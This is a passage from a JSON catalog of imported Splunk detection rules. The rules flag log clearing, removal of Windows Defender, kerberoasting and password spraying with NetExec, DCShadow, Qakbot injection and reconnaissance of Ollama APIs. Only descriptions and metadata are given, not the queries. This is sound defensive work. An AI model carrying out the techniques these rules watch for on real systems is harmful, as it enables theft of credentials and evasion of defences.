If confirmed malicious, this could allow the attacker to maintain persistence, escalate privileges, and execute arbitrary code, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wmi-permanent-event-subscription-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ad05aae6-3b2a-4f73-af97-57bd26cee3b9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wmi_permanent_event_subscription___sysmon.yml" } }, { "id": "splunk-security-content-ad3f352a-0347-48ee-86b9-670b5025a548", "type": "detection", "name": "Ollama Possible API Endpoint Scan Reconnaissance", "description": "Detects API reconnaissance and endpoint scanning activity against Ollama servers by identifying sources probing multiple API endpoints within short timeframes, particularly when using HEAD requests or accessing diverse endpoint paths, which indicates systematic enumeration to map the API surface, discover hidden endpoints, or identify vulnerabilities before launching targeted attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1595" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ollama-possible-api-endpoint-scan-reconnaissance.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ad3f352a-0347-48ee-86b9-670b5025a548", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/ollama_possible_api_endpoint_scan_reconnaissance.yml" } }, { "id": "splunk-security-content-ad517544-aff9-4c96-bd99-d6eb43bfbb6a", "type": "detection", "name": "Windows Event Log Cleared", "description": "The following analytic detects the clearing of Windows event logs by identifying Windows Security Event ID 1102 or System log event 104. This detection leverages Windows event logs to monitor for log clearing activities. Such behavior is significant as it may indicate an attempt to cover tracks after malicious activities. If confirmed malicious, this action could hinder forensic investigations and allow attackers to persist undetected, making it crucial to investigate further and correlate with other alerts and data sources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-event-log-cleared.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ad517544-aff9-4c96-bd99-d6eb43bfbb6a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_event_log_cleared.yml" } }, { "id": 
"splunk-security-content-ad5ac21b-3b1e-492c-8e19-ea5d5e8e5cf1", "type": "detection", "name": "Linux Persistence and Privilege Escalation Risk Behavior", "description": "The following analytic identifies potential Linux persistence and privilege escalation activities. It leverages risk scores and event counts from various Linux-related data sources, focusing on tactics associated with persistence and privilege escalation. This activity is significant for a SOC because it highlights behaviors that could allow an attacker to maintain access or gain elevated privileges on a Linux system. If confirmed malicious, this activity could enable an attacker to execute code with higher privileges, persist in the environment, and potentially access sensitive information, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-persistence-and-privilege-escalation-risk-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ad5ac21b-3b1e-492c-8e19-ea5d5e8e5cf1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_persistence_and_privilege_escalation_risk_behavior.yml" } }, { "id": "splunk-security-content-ada0f478-84a8-4641-a3f1-d82362d6bd71", "type": "detection", "name": "Common Ransomware Notes", "description": "The following analytic detects the creation of files with names commonly associated with ransomware notes.\nIt leverages file-system activity data from the Endpoint 
Filesystem data model, typically populated by endpoint detection and response (EDR) tools or Sysmon logs.\nThis activity is significant because ransomware notes indicate a potential ransomware attack, which can lead to data encryption and extortion.\nIf confirmed malicious, this activity could result in significant data loss, operational disruption, and financial impact due to ransom demands.\nNote that this analytic relies on a lookup table (ransomware_notes_lookup) that contains known ransomware note file names.\nEnsure that this lookup table is regularly updated to include new ransomware note file names as they are identified in the threat landscape.\nAlso, this analytic leverages a sub-search to enhance performance. Sub-searches have limitations on the amount of data they can return. Keep this in mind if you have an extensive list of ransomware note file names.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/common-ransomware-notes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ada0f478-84a8-4641-a3f1-d82362d6bd71", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/common_ransomware_notes.yml" } }, { "id": "splunk-security-content-ada0f478-84a8-4641-a3f1-d82362d6bd75", "type": "detection", "name": "AWS Network Access Control List Created with All Open Ports", "description": "The following analytic detects the creation of AWS Network Access Control Lists (ACLs) with all ports open to a specified 
CIDR. It leverages AWS CloudTrail events, specifically monitoring for `CreateNetworkAclEntry` or `ReplaceNetworkAclEntry` actions with rules allowing all traffic. This activity is significant because it can expose the network to unauthorized access, increasing the risk of data breaches and other malicious activities. If confirmed malicious, an attacker could exploit this misconfiguration to gain unrestricted access to the network, potentially leading to data exfiltration, service disruption, or further compromise of the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-network-access-control-list-created-with-all-open-ports.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ada0f478-84a8-4641-a3f1-d82362d6bd75", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_network_access_control_list_created_with_all_open_ports.yml" } }, { "id": "splunk-security-content-ada0f478-84a8-4641-a3f1-d82362d6fd75", "type": "detection", "name": "AWS Network Access Control List Deleted", "description": "The following analytic detects the deletion of AWS Network Access Control Lists (ACLs). It leverages AWS CloudTrail logs to identify events where a user deletes a network ACL entry. This activity is significant because deleting a network ACL can remove critical access restrictions, potentially allowing unauthorized access to cloud instances. 
If confirmed malicious, this action could enable attackers to bypass network security controls, leading to unauthorized access, data exfiltration, or further compromise of the cloud environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-network-access-control-list-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ada0f478-84a8-4641-a3f1-d82362d6fd75", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_network_access_control_list_deleted.yml" } }, { "id": "splunk-security-content-adbff89c-c1f2-4a2e-88a4-b5e645856510", "type": "detection", "name": "Windows Process With NetExec Command Line Parameters", "description": "The following analytic detects the use of NetExec (formerly CrackMapExec), a toolset used for post-exploitation enumeration and attack within Active Directory environments, through its command-line parameters. It leverages Endpoint Detection and Response (EDR) data to identify specific command-line arguments associated with actions like ticket manipulation, kerberoasting, and password spraying. This activity is significant as NetExec is used by adversaries to exploit Kerberos for privilege escalation and lateral movement. 
If confirmed malicious, this could lead to unauthorized access, persistence, and potential compromise of sensitive information within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1550.003", "T1558.003", "T1558.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-with-netexec-command-line-parameters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "adbff89c-c1f2-4a2e-88a4-b5e645856510", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_with_netexec_command_line_parameters.yml" } }, { "id": "splunk-security-content-adf47620-79fa-11ec-b248-acde48001122", "type": "detection", "name": "Powershell Remove Windows Defender Directory", "description": "The following analytic detects a suspicious PowerShell command attempting to delete the Windows Defender directory. It leverages PowerShell Script Block Logging to identify commands containing \"rmdir\" and targeting the Windows Defender path. This activity is significant as it may indicate an attempt to disable or corrupt Windows Defender, a key security component. 
If confirmed malicious, this action could allow an attacker to bypass endpoint protection, facilitating further malicious activities without detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-remove-windows-defender-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "adf47620-79fa-11ec-b248-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_remove_windows_defender_directory.yml" } }, { "id": "splunk-security-content-ae008c0f-83bd-4ed4-9350-98d4328e15d2", "type": "detection", "name": "Network Connection Discovery With Arp", "description": "The following analytic detects the execution of `arp.exe` with the `-a` flag, which is used to list network connections on a compromised system. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, command-line executions, and related telemetry. Monitoring this activity is significant because both Red Teams and adversaries use `arp.exe` for situational awareness and Active Directory discovery. 
If confirmed malicious, this activity could allow attackers to map the network, identify active devices, and plan further lateral movement or attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1049" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/network-connection-discovery-with-arp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ae008c0f-83bd-4ed4-9350-98d4328e15d2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/network_connection_discovery_with_arp.yml" } }, { "id": "splunk-security-content-ae286126-f2ad-421c-b240-4ea83bd1c43a", "type": "detection", "name": "Azure AD FullAccessAsApp Permission Assigned", "description": "The following analytic detects the assignment of the 'full_access_as_app' permission to an application within Office 365 Exchange Online. This is identified by the GUID 'dc890d15-9560-4a4c-9b7f-a736ec74ec40' and the ResourceAppId '00000002-0000-0ff1-ce00-000000000000'. The detection leverages the azure_monitor_aad data source, focusing on AuditLogs with the operation name 'Update application'. This activity is significant as it grants broad control over Office 365 operations, including full access to all mailboxes and the ability to send emails as any user. 
If malicious, this could lead to unauthorized access and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.002", "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-fullaccessasapp-permission-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ae286126-f2ad-421c-b240-4ea83bd1c43a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_fullaccessasapp_permission_assigned.yml" } }, { "id": "splunk-security-content-ae874ad8-e353-40a7-87d4-420cdfb27d1a", "type": "detection", "name": "Zscaler Malware Activity Threat Blocked", "description": "The following analytic identifies potential malware activities within a network that are blocked by Zscaler. It leverages web proxy logs to filter for blocked actions associated with malware, aggregating occurrences by user, URL, and threat category. This detection is significant for SOC as it highlights attempts to access malicious content, indicating potential compromise or targeted attacks. 
If confirmed malicious, this activity could signify an ongoing attempt to infiltrate the network, necessitating immediate investigation to prevent further threats and ensure network integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zscaler-malware-activity-threat-blocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ae874ad8-e353-40a7-87d4-420cdfb27d1a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/zscaler_malware_activity_threat_blocked.yml" } }, { "id": "splunk-security-content-ae8b3efc-2d2e-11ec-8b57-acde48001122", "type": "detection", "name": "ServicePrincipalNames Discovery with SetSPN", "description": "The following analytic detects the use of `setspn.exe` to query the domain for Service Principal Names (SPNs). This detection leverages Endpoint Detection and Response (EDR) data, focusing on specific command-line arguments associated with `setspn.exe`. Monitoring this activity is crucial as it often precedes Kerberoasting or Silver Ticket attacks, which can lead to credential theft. 
If confirmed malicious, an attacker could use the gathered SPNs to escalate privileges or persist within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/serviceprincipalnames-discovery-with-setspn.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ae8b3efc-2d2e-11ec-8b57-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/serviceprincipalnames_discovery_with_setspn.yml" } }, { "id": "splunk-security-content-ae915743-1aa8-4a94-975c-8062ebc8b723", "type": "detection", "name": "Windows AD DCShadow Privileges ACL Addition", "description": "This detection identifies an Active Directory access-control list (ACL) modification event, which applies the minimum required extended rights to perform the DCShadow attack.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484", "T1207", "T1222.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-dcshadow-privileges-acl-addition.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ae915743-1aa8-4a94-975c-8062ebc8b723", 
"source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_dcshadow_privileges_acl_addition.yml" } }, { "id": "splunk-security-content-ae9b0df5-5fb0-477f-abc9-47faf42aa91d", "type": "detection", "name": "Windows Unusual NTLM Authentication Destinations By Source", "description": "The following analytic detects when an unusual number of NTLM authentications are attempted by the same source against multiple destinations. This activity generally results when an attacker attempts to brute force, password spray, or otherwise authenticate to multiple domain-joined Windows devices using an NTLM-based process/attack. This same activity may also generate a large number of EventID 4776 events.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-ntlm-authentication-destinations-by-source.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "ae9b0df5-5fb0-477f-abc9-47faf42aa91d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_ntlm_authentication_destinations_by_source.yml" } }, { "id": "splunk-security-content-aec157f4-8783-4584-aca6-754c4dc7fba9", "type": "detection", "name": "Windows List ENV Variables Via SET Command From Uncommon Parent", "description": "The following analytic identifies a suspicious process command line 
fetching environment variables using the cmd.exe \"set\" command, with a non-shell parent process. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and parent process names. This activity could be significant as it is commonly associated with malware like Qakbot, which uses this technique to gather system information. If confirmed malicious, this behavior could indicate that the parent process has been compromised, potentially allowing attackers to execute arbitrary commands, escalate privileges, or persist within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-list-env-variables-via-set-command-from-uncommon-parent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "aec157f4-8783-4584-aca6-754c4dc7fba9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_list_env_variables_via_set_command_from_uncommon_parent.yml" } }, { "id": "splunk-security-content-aec755a5-3a2c-4be0-ab34-6540e68644e9", "type": "detection", "name": "Windows Process Injection Of Wermgr to Known Browser", "description": "The following analytic identifies the suspicious remote thread execution of the wermgr.exe process into known browsers such as firefox.exe, chrome.exe, and others. It leverages Sysmon EventCode 8 logs to detect this behavior by monitoring SourceImage and TargetImage fields. 
This activity is significant because it is indicative of Qakbot malware, which injects malicious code into legitimate processes to steal information. If confirmed malicious, this activity could allow attackers to execute arbitrary code, escalate privileges, and exfiltrate sensitive data from the compromised host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-injection-of-wermgr-to-known-browser.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "aec755a5-3a2c-4be0-ab34-6540e68644e9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_injection_of_wermgr_to_known_browser.yml" } }, { "id": "splunk-security-content-aecaddaa-5885-4e44-a724-1edd5ecbc79f", "type": "detection", "name": "Windows Wmic Memory Chip Discovery", "description": "The following analytic detects the execution of Windows Management Instrumentation Command-line (WMIC) commands related to memory chip discovery on a Windows system. Specifically, it monitors instances where commands such as \u201cwmic memorychip\u201d are used to retrieve detailed information about installed RAM modules. While these commands can serve legitimate administrative and troubleshooting purposes, they may also be employed by adversaries to gather system hardware specifications as part of their reconnaissance activities. 
By identifying and alerting on WMIC memory chip queries, security teams can enhance their ability to spot unauthorized information gathering and take proactive measures to mitigate potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-wmic-memory-chip-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "aecaddaa-5885-4e44-a724-1edd5ecbc79f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_wmic_memory_chip_discovery.yml" } }, { "id": "splunk-security-content-aee4a575-7064-4e60-b511-246f9baf9895", "type": "detection", "name": "AWS Password Policy Changes", "description": "The following analytic detects successful API calls to view, update, or delete the password policy in an AWS organization. It leverages AWS CloudTrail logs to identify events such as \"UpdateAccountPasswordPolicy,\" \"GetAccountPasswordPolicy,\" and \"DeleteAccountPasswordPolicy.\" This activity is significant because it is uncommon for regular users to perform these actions, and such changes can indicate an adversary attempting to understand or weaken password defenses. 
If confirmed malicious, this could lead to compromised accounts and increased attack surface, potentially allowing unauthorized access and control over AWS resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1201" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-password-policy-changes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "aee4a575-7064-4e60-b511-246f9baf9895", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_password_policy_changes.yml" } }, { "id": "splunk-security-content-aeff2bb5-3483-48d4-9be8-c8976194be1e", "type": "detection", "name": "Cisco Secure Firewall - Repeated Malware Downloads", "description": "The following analytic detects repeated malware file downloads initiated by the same internal host (src) within a short time window. It leverages Cisco Secure Firewall Threat Defense logs and identifies `FileEvent` events with a `SHA_Disposition` of \"Malware\" and `FileDirection` set to \"Download\". If ten or more such events occur from the same host within five minutes, this analytic will trigger. This activity may indicate the host is compromised and repeatedly retrieving malicious content either due to command-and-control, malware staging, or automation. 
If confirmed malicious, this behavior may represent an infection in progress, a persistence mechanism, or a malicious downloader.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105", "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-repeated-malware-downloads.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "aeff2bb5-3483-48d4-9be8-c8976194be1e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___repeated_malware_downloads.yml" } }, { "id": "splunk-security-content-af01f6db-26ac-440e-8d89-2793e303f137", "type": "detection", "name": "Windows DLL Side-Loading In Calc", "description": "The following analytic detects the loading of the \"WindowsCodecs.dll\" by calc.exe from a non-standard location. This could be indicative of a potential DLL side-loading technique. This detection leverages Sysmon EventCode 7 to identify the DLL side-loading activity. In previous versions of the \"calc.exe\" binary, namely on Windows 7, it was vulnerable to DLL side-loading, where an attacker is able to load an arbitrary DLL named \"WindowsCodecs.dll\". This technique has been observed in Qakbot malware. This activity is significant as it indicates potential malware execution through a trusted process, which can bypass security controls. 
If confirmed malicious, this could allow attackers to execute arbitrary code, maintain persistence, and escalate privileges within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-dll-side-loading-in-calc.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "af01f6db-26ac-440e-8d89-2793e303f137", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_dll_side_loading_in_calc.yml" } }, { "id": "splunk-security-content-afed020e-edcd-4913-a675-cebedf81d4fb", "type": "detection", "name": "GitHub Enterprise Disable IP Allow List", "description": "The following analytic identifies when an IP allow list is disabled in GitHub Enterprise. The detection monitors GitHub Enterprise audit logs for actions related to disabling IP allow lists at the organization or enterprise level. This behavior is concerning because IP allow lists are a critical security control that restricts access to GitHub Enterprise resources to only trusted IP addresses. When disabled, it could indicate an attacker attempting to bypass access controls to gain unauthorized access from untrusted networks. The impact includes potential exposure of sensitive code repositories and GitHub Enterprise resources to access from any IP address. 
SOC teams should investigate such events, especially if they were not pre-approved changes, as they may indicate compromise of admin credentials or malicious insider activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-enterprise-disable-ip-allow-list.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "afed020e-edcd-4913-a675-cebedf81d4fb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_enterprise_disable_ip_allow_list.yml" } }, { "id": "splunk-security-content-afed80b2-d34b-11eb-a952-acde48001122", "type": "detection", "name": "Powershell Enable SMB1Protocol Feature", "description": "The following analytic detects the enabling of the SMB1 protocol via `powershell.exe`. It leverages PowerShell script block logging (EventCode 4104) to identify the execution of the `Enable-WindowsOptionalFeature` cmdlet with the `SMB1Protocol` parameter. This activity is significant because enabling SMB1 can facilitate lateral movement and file encryption by ransomware, such as RedDot. 
If confirmed malicious, this action could allow an attacker to propagate through the network, encrypt files, and potentially disrupt business operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-enable-smb1protocol-feature.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "afed80b2-d34b-11eb-a952-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_enable_smb1protocol_feature.yml" } }, { "id": "splunk-security-content-b0359e05-c87b-4354-83d8-aee0d890243f", "type": "detection", "name": "Windows User Disabled Via Net", "description": "The following analytic detects the use of the `net.exe` utility to disable a user account via the command line. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs and command-line arguments. This activity is significant as it may indicate an adversary's attempt to disrupt user availability, potentially as a precursor to further malicious actions. 
